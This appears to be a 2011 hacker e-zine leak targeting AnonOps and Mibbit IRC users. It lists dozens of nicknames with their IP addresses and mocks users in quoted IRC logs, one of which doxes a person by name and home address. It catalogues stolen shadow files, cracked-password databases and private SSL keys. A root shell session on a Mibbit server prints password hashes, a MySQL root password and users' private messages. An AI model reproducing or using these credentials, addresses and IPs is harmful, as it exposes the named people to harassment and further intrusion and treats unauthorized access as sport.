AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
:: 0x06 ~ l0l sh1t ::
Here's a bit of quotes we found funny.
_ _ _
| | | | (_)
__| | __ _| |__ ___ ___ __ _ _ ___ _ __ ___ __ _ _ __
/ _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \
| (_| | (_| | |_) | (_) | (_) | (_| | | __/ | | | | | (_| | | | |
\__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
__/ |
|___/
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
gline and/or kill
_
(_)
_ __ _ ___
| '_ \| |/ _ \
| |_) | | __/
| .__/|_|\___|
| |
|_|
<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
_ _
| | | |
___ __ _| | ___| |__
/ __/ _` | |/ _ \ '_ \
| (_| (_| | | __/ |_) |
\___\__,_|_|\___|_.__/
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack?
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
@CalebNewz: somehow their hitting my ip table.
_____ _____ _ __
/ _ \ \ /\ / / _ \ '_ \
| (_) \ V V / __/ | | |
\___/ \_/\_/ \___|_| |_|
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2
_ _____ __
/\ | | |__ \ \ / /
/ \ | |__ __ _ ) \ \_/ /
/ /\ \ | '_ \ / _` | / / \ /
/ ____ \| | | | (_| |/ /_ | |
/_/ \_\_| |_|\__,_|____| |_|
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it
____ ____ _ _ _
| _ \ _____ _____ _ _|___ \ / \ | | |
| |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
| __/ (_) \ V V / __/ | / __/ / ___ \| | |
|_| \___/ \_/\_/ \___|_| |_____/_/ \_\_|_|
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
That just smacks of gross negligence. Turn in your Guy Fawkes mask.
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
the provider.
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
_
_ __ ___ _ __ ___ ___| | ___ ___ _ __
| '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \
| | | __/ | | | | \__ \ | __/ __/ |_) |
|_| \___|_| |_| |_|___/_|\___|\___| .__/
|_|
D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
Names: Rick Bonata
Address 221 FRANKLIN AVE
CUYAHOGA FALLS, OH 44221
<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D
<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi
<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers
<remsleep> If the FBI does come, or whomever for whatever reason, I will have
them on camera with a live feed with a 3G modem backup streaming to one of
my VDSs. I would be unstopable after that, I would sue for false arrest,
kidnapping, conspiracy to each, general fuckery as well as a large sum of
punitive damages.
<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less.
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
[remsleep] Memo to ANY Law Enforcement: You are compelled to
leave this network, failure to do so will result in whatever
evidence obtained being after this point will become sealed
and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
notices attached to their servers
:: 0x07 ~ FiL3z ::
We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.
Filename Description
shadow /etc/shadow, self explanatory
oper.db Anope Oper Database
chan.db Anope Channel Database
nick.db Anope NickServ Database
keys.txt AnonOps private ssl key/cert
defaults.conf InspIRCd Conf.
nick.out.txt Human readable NickServ database w/ cracked passwords,
nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
access lists, akick lists, badwords, ..etc.
:: 0x08 ~ exit ::
tl;dr JAJA ANONOPS ESTAN MUERTO. (LOL DEAD)
AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.
VIVA LA CARLOS1337!!!!!
shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
for fighting the good fight.

754
htp/HTP-Mibbit.txt
View file

@ -1,754 +0,0 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
88888888888 888 888 8888888888 ,-:` \;',`'-
888 888 888 888 .'-;_,; ':-;_,'.
888 888 888 888 /; '/ , _`.-\
888 8888888888 8888888 | '`. (` /` ` \`|
888 888 888 888 |:. `\`-. \_ / |
888 888 888 888 | ( `, .`\ ;'|
888 888 888 888 \ | .' `-'/
888 888 888 8888888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888
888 Y88b 888 d88888 8888b 888 888 888
888 888 888 d88P888 88888b 888 888 888
888 d88P 888 d88P 888 888Y88b 888 8888888 888
8888888P" 888 d88P 888 888 Y88b888 888 888
888 888 d88P 888 888 Y88888 888 888
888 888 d8888888888 888 Y8888 888 888
888 88888888 d88P 888 888 Y888 8888888888 888
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- _ _ _ _ _
- _ __ ___ (_) |__ | |__ (_) |_
- | '_ ` _ \| | '_ \| '_ \| | __|
- | | | | | | | |_) | |_) | | |_
- |_| |_| |_|_|_.__/|_.__/|_|\__|
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h@ck ~]$ ssh root@tools.mibbit.com
root@tools.mibbit.com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root@tools:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root@tools:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root@tools:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root@tools:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root@tools:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root@tools:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root@tools:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root@tools:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root@tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root@tools:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
>>> karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
>>> thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
>>> ??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
>>> ...
[h@ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h@ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
>>> f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h@ck ~]$ ssh wwwadmin@status.mibbit.com
wwwadmin@status.mibbit.com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin@status:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
